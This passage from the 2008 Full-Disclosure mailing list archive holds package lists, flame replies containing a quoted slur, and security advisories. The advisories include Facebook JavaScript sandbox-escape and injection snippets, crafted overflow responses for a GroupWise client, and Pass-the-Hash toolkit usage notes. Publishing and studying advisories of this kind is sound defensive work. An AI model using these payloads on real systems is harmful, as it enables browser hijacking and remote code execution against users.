e674ecd502eacda834368c557e1b6143 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 9294592 79e1b6e99dbce290cd56ba6755dc881d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 228854 5fdbf6bd20f86f70797316b36ab4d173 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 163288 b78c777702f3df4f0ebea2ebe63ce6d6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 254924 3465792dc109b728a78d6ffb29f53376 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 809578 4b2310f5cb97c4e296180cb40756a894 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 52298392 2b28d6ee19d84e536245eb95d0a8a909 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 3188938 7018bb95c07c6aaa97cde7b972a20166 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 90740 bc84e90a93fb5b7b9f20d67c86c03a2e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 62926 e57644c65aea1a4f90f523353bf1e5b1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 10365110 3c0dfb58abb3d0efa6735f4cc98d7b20 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 228860 3ba05d40bcb2a5f81c1b109015c4784a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 180002 733154c484aa8048529f64e366d8cb29 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 254952 ced3de59adae121b57919d85ef2ee7c8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 896026 c822eb94fd5cebae2c49ffd3afcfaef4 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 49823786 e4c4ad5e13abfc980dcb8845170a6066 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 3175916 2736c2ab5c8fe48c0f2bfc670237f7d3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 86592 9794cd53ceaab43313006dc928090ca6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 62138 c4d4d60255fa8a232436103ecbbe8d26 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 9571186 d2d4086ccfe3d59683645a431822f0f4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 228848 a3b0b8cf03b5ccd5da1e4bfe4debde7e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 162076 6264a5f87b7d8492afbeec02f14a97fe http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 254936 ba67be4782a972a18fe465fca598b34b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 801408 074ce0ac99fbfe8467768644edc25dad Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10.diff.gz Size/MD5: 193549 3df61e6e5dda06822772c81f55a5e09c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10.dsc Size/MD5: 1189 e474d538b042590c54cf779317c127be http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly.orig.tar.gz Size/MD5: 37810765 e123b1b65f4ed97980590928f961c5f2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.15+1nobinonly-0ubuntu0.7.10_all.deb Size/MD5: 200814 973c84088bba9fe7619562607649ae91 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 78049446 ff9b6ef4ff7e676de1e7631bf7cb8a3d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 3197256 c69ca60dc08dc4dd83b53df27cbd7f32 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 98146 cb5365397df1022104b9c9d8de5b6409 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 67152 1b33bdeb31a95455a4ea0a6024cc76e1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 10460276 7b2bf1c6f2e685e09d1e5dd937a380b4 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 77181324 f27d2a52d29eb953a2a2b2e72251ecfe http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 3184840 e58f0f841248dbdc40513724ddaa84cf http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 91840 87c455efc0df2403f962b0df9d4e6177 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 66434 2bf2dc0e8a6333c58577db96edd98e35 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 9203290 7e0ebb7384bd4b504bff560e370291a5 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 77460616 71b471e86aa5c6e2eac09a3251b80d94 http://ports.ubuntu.com/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 3182378 d90bfbae7b9743aeb4d592f517361c90 http://ports.ubuntu.com/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 91500 97848bd89ef94ffc7bd095185fe508f0 http://ports.ubuntu.com/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 66380 8dd93b124088314c1449195ce8201f6c http://ports.ubuntu.com/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 9062590 4850c76f7d1e1c6ca9658863ac77e15f powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 80664386 0d6ef7225c028ede3092d9f86af0d736 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 3200788 05c74bf9d2ee0d0407c41a83651ea0a4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 96178 58b2e155dc810ef5ea790e7af6bbd71d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 67430 8b6d5d82b36e32c68b1b8eb2aeddd06e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 10303234 18af52f985e61e7b4d9f573aafd5b6d6 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 78015546 63c0534c7bba8d01e36158fb58b6693e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 3182386 45c83bd5709c26e42d19a4a02d7e72ec http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 91608 ad47d76f9e3afec9105cefaf73510d82 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 66516 32af5ef7efccbd08fa8d83811d197384 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 9453348 532a9a6fac002e08dfde90555242d54a -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/8f5bfdf3/attachment.bin From mrdkaaa at stream.cz Wed Jul 2 17:33:47 2008 From: mrdkaaa at stream.cz (mrdkaaa) Date: Wed, 02 Jul 2008 18:33:47 +0200 (CEST) Subject: [Full-disclosure] Full-Disclosure? introducing lul-disclosure. In-Reply-To: <20080702082943.2811aba5@wssyg117.sygroup-int.ch> Message-ID: <20.36-21823-232776016-1215016427@stream.cz> Tonnerre, does it hurt you to use your brain for thinking? m. > ------------ P?vodn? zpr?va ------------ > Od: Tonnerre Lombard > P?edm?t: Re: [Full-disclosure] Full-Disclosure? introducing lul-disclosure. > Datum: 02.7.2008 08:31:26 > ---------------------------------------- > Salut, > > On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote: > > Are you ready for a site that isn't full of fagottry? Where Gadi cant > > steal your money or eat your lunches? Where you can freely submit > > lulz to be published? Where Theo's defeat and denial are brought to > > light? Wait no more! > > You mean a site which evidently cannot tell the difference between > local and remote root vulnerabilities? (The local root exploit for > obsd4 which is published on that site contains a patch to increment the > count of _remote_ vulnerabilities on the obsd web site.) > > Tonnerre > -- > SyGroup GmbH > Tonnerre Lombard > > Solutions Systematiques > Tel:+41 61 333 80 33 G?terstrasse 86 > Fax:+41 61 383 14 67 4053 Basel > Web:www.sygroup.ch tonnerre.lombard at sygroup.ch > > > From remove-vuln at secunia.com Wed Jul 2 15:53:27 2008 From: remove-vuln at secunia.com (Secunia Research) Date: Wed, 2 Jul 2008 16:53:27 +0200 Subject: [Full-disclosure] Secunia Research: VLC Media Player WAV Processing Integer Overflow Message-ID: <200807021453.m62ErRFj011250@ca.secunia.com> ====================================================================== Secunia Research 02/07/2008 - VLC Media Player WAV Processing Integer Overflow - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 ====================================================================== 1) Affected Software * VLC Media Player 0.8.6h on Windows NOTE: Prior versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: System access Where: Remote ====================================================================== 3) Vendor's Description of Software "VLC media player is a highly portable multimedia player for various audio and video formats (MPEG-1, MPEG-2, MPEG-4, DivX, mp3, ogg, ...) as well as DVDs, VCDs, and various streaming protocols." Product Link: http://www.videolan.org/vlc/ ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in VLC Media Player, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an integer overflow error within the "Open()" function in modules/demux/wav.c. This can be exploited to cause a heap-based buffer overflow via a specially crafted WAV file having an overly large "fmt" chunk. Successful exploitation may allow execution of arbitrary code. ====================================================================== 5) Solution Update to version 0.8.6i, which should be available soon. Do not open untrusted WAV files. ====================================================================== 6) Time Table 27/06/2008 - Vendor notified. 30/06/2008 - Vendor response. 02/07/2008 - Public disclosure. ====================================================================== 7) Credits Discovered by Alin Rad Pop, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2008-2430 for the vulnerability. ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://corporate.secunia.com/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://corporate.secunia.com/secunia_research/33/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/secunia_vacancies/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2008-29/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From xploitable at gmail.com Wed Jul 2 19:16:38 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 2 Jul 2008 19:16:38 +0100 Subject: [Full-disclosure] n3td3v podcast Message-ID: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> n3td3v is starting a podcast soon, I will be talking about the latest news post on n3td3v - Google Groups ... watch the internet for more info. All the best, n3td3v Public website: http://n3td3v.googlepages.com From hernan at gmail.com Wed Jul 2 19:42:15 2008 From: hernan at gmail.com (Hernan Ochoa) Date: Wed, 2 Jul 2008 15:42:15 -0300 Subject: [Full-disclosure] Release of Pass-The-Hash Toolkit v1.4 Message-ID: Source Code: http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4-src.tgz Win32 Binaries: http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4.tgz Documentation/info: http://oss.coresecurity.com/projects/pshtoolkit.htm http://oss.coresecurity.com/pshtoolkit/doc/index.html http://hexale.blogspot.com http://www.hexale.org/forums What's new?: (http://oss.coresecurity.com/pshtoolkit/release/1.4/WHATSNEW) *Support for XP SP 3 for whosthere/iam (whosthere-alt/iam-alt work on xp sp3 without requiring any update) *New -t switch for whosthere/whosthere-alt: establishes interval used by the -i switch (by default 2 seconds). *New -a switch for whosthere/iam: specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESSIONLIST_COUNT_ADDR (WARNING!: if you use the wrong values the system may crash) The idea is that, if you find yourself in a version of Windows where whosthere/iam don't work (and iam-alt/whosthere-alt don't work either); you can run LSASRV.DLL thru IDA, run the PASSTHEHASH.IDC script included in the Pass-The-Hash toolkit, and use the addresses found by the script with the -a switch. This basically allows you to specify addresses at runtime to whosthere whithout the need to recompile the tool. *New -r switch for iam/iam-alt: Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe) *genhash now outputs hashes using the LM HASH:NT HASH format *several bugfixes and stuff From noreply at infobyte.com.ar Wed Jul 2 22:13:01 2008 From: noreply at infobyte.com.ar ([ISR] - Infobyte Security Research) Date: Wed, 2 Jul 2008 18:13:01 -0300 Subject: [Full-disclosure] Novell GroupWise Messenger Client (GWIM) Remote Stack Overflow Message-ID: <200807021813.01654.noreply@infobyte.com.ar> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 || || [ISR] || Infobyte Security Research || www.infobyte.com.ar || 07.02.2008 || .:: SUMMARY Novell GroupWise Messenger Client (GWIM) Remote Stack Overflow Version: 2.0, It is suspected that all previous versions of Groupwise Messenger Client are vulnerable. .:: BACKGROUND Novell GroupWise Messenger is a corporate instant messaging product that uses Novell eDirectory? as its user database More info: http://www.novell.com .:: VULNERABILITY VIDEO DEMO http://www.infobyte.com.ar/demo/ISR_groupwise_messenger.html .:: POC ISR-groupwisemsn.pl, simple fake groupwise msn server. http://www.infobyte.com.ar/developments.html .:: DESCRIPTION Issue 1: - ------- This issue is due to a failure of the application to securely parse the server's response. The application server works similarly to HTTP protocol, default tcp port 8300. The server always response the client's request with something like this: " HTTP/1.0 200 \r Date: xxx, xx xxx xxxx xx:xx:xx GMT\r Pragma: no-cache\r Cache-Control: no-cache\r \r %VALUES% \0\0\0 \0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0 \0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0 " If the client application receive a server response to any request like the following, a stack overflow is occurred: " HTTP/1.0 200 \r Date: xxx, xx xxx xxxx xx:xx:xx GMT\r Pragma: no-cache\r Cache-Control: no-cache\r \r %VALUES% \0\0\0 \0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0 \0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0"+ "AAAAAAAAAA...." x 5000 Issue 2: - ------ We found another stack overflow regarding the client's popup alerts, when you receive a message of another user the server send a string like this to the client: "l\0\0\x001\0\0\0CN=XXXX,OU=XX,OU=XXXX,OU=XX,OU=XX,O=INFOBYTEXX\0'\0\0\0[87 1F8247-4B110000-0A01C80A-6C20-010 0]\0\1\0\0\0\xE4\0\0\0{\\rtf1\\fbidis\\ansi\\ansicpg1252\\deff0\\deflang308 2{\\fonttbl{\\f0\\fswiss\\fprq2\\fcharset0 fontname;}}\r\n{\\colortbl;\\red0\\green0\\blue0;}\r\n\\viewkind4\\uc1\\par d\\ltrpar\\li50\\ri50\\cf1\\f0\\fs20 MESSAGE\\par\r\n}\r\n\0"; If a client receive a string like this but in any place of the string it's added an "A" x 5000 you have another stack overflow. .:: IMPACT Both vulnerabilities permit arbitrary code execution. .:: VENDOR RESPONSE Vendor advisory: http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5026700.html .:: CVE INFORMATION Id: CVE-2008-2703, CVE-2008-2704 Web: http://cve.mitre.org .:: DISCLOSURE TIMELINE 01/12/2008 Initial vendor notification 01/13/2007 Initial vendor response notify research 06/10/2007 Coordinated public disclosure .:: CREDIT Francisco Amato is credited with discovering this vulnerability. famato][at][infobyte][dot][com][dot][ar .:: LEGAL NOTICES Copyright (c) 2007 by [ISR] Infobyte Security Research. Permission to redistribute this alert electronically is granted as long as it is not edited in any way unless authorized by Infobyte Security Research Response. Reprinting the whole or part of this alert in any medium other than electronically requires permission from infobyte com ar Disclaimer The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iQEVAwUBSGvqefr3+fypwNnjAQLsawf/eNzyFnlo5MgWhZUTIlvfbAj7C5OtVYBm +uVGOxG4ljtfYj7R5UPkHMUxXKOGDjbkeot0ohOgxhW3WD7IgkSe9Ionkmjpkvv9 FoKPKtMcSOctx6oGcqOAHYjz96Biiu5OzC/2yullLoP6PRgO2PKYRD8iYMa2DSla vQXgrA3svfuKId7fF3PMtXqbI+mwqHFS+3zQNE4vwDU7gaMGRqSvK3BswgD/uuxo JM5bjREjwCEA7i3/qdGlFHNaRXr/6sIWSsjORenhAefGMmaJiwFFBYY1IPcL4EDn bRv9JSToQ5xImGgLCVRk77VliZGz31zRGwsA3ue05XHFN4NYU6YvjA== =Uw2K -----END PGP SIGNATURE----- From jouko at iki.fi Thu Jul 3 00:01:28 2008 From: jouko at iki.fi (Jouko Pynnonen) Date: Thu, 3 Jul 2008 02:01:28 +0300 Subject: [Full-disclosure] Facebook script injection vulnerabilities Message-ID: <7af564ad0807021601pfd2a87clcc124fbe8b897510@mail.gmail.com> Hello, This is a summary of various Facebook security issues found and reported since June 13, 2008. Two of the vulnerabilities still remain on the site, so no details of them are disclosed here. The rest have been fixed. Any of these could be exploited to take over the victim's web browser temporarily to e.g. read inbox messages, forcibly install FB applications, manipulate friend lists, post messages as the victim user, etc. Any of these would also allow creation of a self-propagating JavaScript virus/worm. Most of the issues require the victim user to click on a profile box or visit a canvas page of an application in order to trigger the injected JavaScript. Issues 2) and 3) don't require mouse clicks. The vulnerabilities were tested with two browsers: Firefox 3 (Linux + Windows) and Internet Explorer 7. 1) Escaping JS sandbox with literal Function constructor reference Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages) Description: The JS sandbox denies references to Function.constructor but using a literal such as "function f() { }" in the code and refering to its constructor with the "bracket syntax" was possible. The example below uses this method and calls the constructor with a string argument, then calls the resulting Function object. Browsers: FF, IE Reported: June 13, 2008 Fixed: yes Example: (function f(){}["constructor"]("alert('any javascript here');"))(); 2) Fb:silverlight JS injection Impact: execution of unrestricted JS on canvas pages, profiles Description: Simple XSS, described in the previous message to full-disclosure. Browsers: FF, IE Reported: June 16, 2008 Fixed: yes Example: 3) Injecting JS in Feeds Impact: execution of unrestricted JS when viewing Feeds on profile page or the "home" page Description: Insufficient input validation in the publishTemplatizedAction API method. Browsers: FF, IE Reported: June 16, 2008 Fixed: yes Example: # using the perl API $facebook->feed->publish_templatized_action( title => "My Title", title_template => "{actor} is testing feed stories", body_template => "hello", image_1 => "http://www.mysite.com/image.gif'\" onload=(function f(){}['constructor']('alert(1)'))();", image_1_link => "http://www.mysite.com" ); 4) Escaping JS sandbox with literal Number reference Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages) Description: Using the "bracket syntax" to reference the __parent__ property of a floating point number to get a Window object reference, then calling its eval() to run arbitrary code. IE doesn't support the property. Browsers: FF Reported: June 18, 2008 Fixed: yes Example: 5) Injecting JS in video attachments Impact: execution of unrestricted JS when a inbox, wall or forum message is viewed (mouseclick required) Description: When sharing video content with the http://www.facebook.com/sharer.php form, some input fields can be modified e.g. with JavaScript. The example below can be typed in the address bar to inject JS in a message. Browsers: FF, IE Reported: June 20, 2008 Fixed: yes Example: javascript:f=document.forms[0];f['attachment[params][video][src]'].value='#" a=b> 6) Escaping JS sandbox with E4X Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages). Works in browsers supporting E4X (Firefox) Description: JS parser in browsers supporting E4X understand XML, which can contain multi-line strings. Facebook's JS sandbox technology didn't expect XML and multi-line strings. The example below demonstrates how this could be used to fool the sandbox logic. Browsers: FF Reported: June 26, 2008 Fixed: yes Example: 7) Escaping JS sandbox Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages) Browsers: FF Reported: June 21, 2008 Fixed: no 8) Escaping JS sandbox Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages) Browsers: FF Reported: June 21, 2008 Fixed: no -- Jouko Pynn?nen http://iki.fi/jouko Finland From mrdkaaa at stream.cz Thu Jul 3 01:20:11 2008 From: mrdkaaa at stream.cz (mrdkaaa) Date: Thu, 03 Jul 2008 02:20:11 +0200 (CEST) Subject: [Full-disclosure] Novell GroupWise Messenger Client (GWIM) Remote Stack Overflow In-Reply-To: <200807021813.01654.noreply@infobyte.com.ar> Message-ID: <28.44-12928-1229769866-1215044411@stream.cz> amazing :) > .:: DISCLOSURE TIMELINE > > 01/12/2008 Initial vendor notification > 01/13/2007 Initial vendor response notify research > 06/10/2007 Coordinated public disclosure > From staff at lul-disclosure.net Wed Jul 2 05:07:40 2008 From: staff at lul-disclosure.net (staff) Date: Wed, 2 Jul 2008 00:07:40 -0400 Subject: [Full-disclosure] Critical Aol Insta Chats Bug! Message-ID: Critical vulnerability in Aol Insta Chats could allow remote compromise! http://lul-disclosure.net/exploits/lul-aim.txt Greetz to Aviv Raff! -- submit to: staff [at] lul-disclosure.net -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/ca7bd282/attachment.html From dancho.danchev at gmail.com Thu Jul 3 13:52:20 2008 From: dancho.danchev at gmail.com (Dancho Danchev) Date: Thu, 3 Jul 2008 15:52:20 +0300 Subject: [Full-disclosure] =?windows-1252?q?Gmail=2C_Yahoo_and_Hotmail=92s?= =?windows-1252?q?_CAPTCHA_broken_by_spammers?= Message-ID: Hello, Breaking Gmail, Yahoo and Hotmail's CAPTCHAs, has been an urban legend for over two years now, with do-it-yourself CAPTCHA breaking services, and proprietary underground tools assisting spammers, phishers and malware authors into registering hundreds of thousands of bogus accounts for spamming and fraudulent purposes. This post intends to make this official, by covering an underground service offering thousands of already registered Gmail, Yahoo and Hotmail accounts for sale, with new ones registered every second clearly indicating the success rate of their CAPTCHA breaking capabilities at these services : http://blogs.zdnet.com/security/?p=1418 Regards -- Dancho Danchev Cyber Threats Analyst/Blogger http://ddanchev.blogspot.com http://blogs.zdnet.com/security http://windowsecurity.com/Dancho_Danchev From announce-noreply at rpath.com Thu Jul 3 14:05:45 2008 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Thu, 03 Jul 2008 09:05:45 -0400 Subject: [Full-disclosure] rPSA-2008-0212-1 tshark wireshark Message-ID: <486ccea9.DPckXhTwzo1aD3Ki%announce-noreply@rpath.com> rPath Security Advisory: 2008-0212-1 Published: 2008-07-03 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Indirect Deterministic Information Exposure Updated Versions: tshark=conary.rpath.com at rpl:1/1.0.1-0.1-1 wireshark=conary.rpath.com at rpl:1/1.0.1-0.1-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2638 Description: Previous versions of the wireshark package are vulnerable to multiple types of attacks, including Information Exposures (disclosures of system memory) and Denials of service (application crashes). It has not been determined that these vulnerabilities can be exploited to execute malicious code. http://wiki.rpath.com/Advisories:rPSA-2008-0212 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html From announce-noreply at rpath.com Thu Jul 3 13:57:26 2008 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Thu, 03 Jul 2008 08:57:26 -0400 Subject: [Full-disclosure] rPSA-2008-0211-1 mercurial mercurial-hgk Message-ID: <486cccb6./Pv2KH8iBdkWlEln%announce-noreply@rpath.com> rPath Security Advisory: 2008-0211-1 Published: 2008-07-03 Products: rPath Linux 2 Rating: Major Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: mercurial=conary.rpath.com at rpl:2/1.0.1-1-0.1 mercurial-hgk=conary.rpath.com at rpl:2/1.0.1-1-0.1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2633 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2942 Description: Previous versions of the mercurial package are vulnerable to an Unauthorized Access attack in which maliciously crafted patches may overwrite arbitrary local files, including files located outside mercurial repositories. http://wiki.rpath.com/Advisories:rPSA-2008-0211 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html From DDI.VulnerabilityAlert at digitaldefense.net Thu Jul 3 14:36:53 2008 From: DDI.VulnerabilityAlert at digitaldefense.net (DDI_Vulnerability_Alert) Date: Thu, 3 Jul 2008 08:36:53 -0500 Subject: [Full-disclosure] DDIVRT-2008-12-ServerView SnmpGetMibValues.exe Buffer Overflow Message-ID: <2571D31D42513640AE1632FEE100E0E40191E74F@hypercom.defense.local> Title ----- DDIVRT-2008-12-ServerView SnmpGetMibValues.exe Buffer Overflow Severity -------- High Date Discovered --------------- May 1st, 2008 Discovered By ------------- Digital Defense, Inc. Vulnerability Research Team Credit: Steven James, Mike James, and r at b13$ Vulnerability Description ------------------------- ServerView is a server management suite. Several buffer overflow conditions exist in remotely-accessible portions of the suite. Authenticated users (by default, all users) 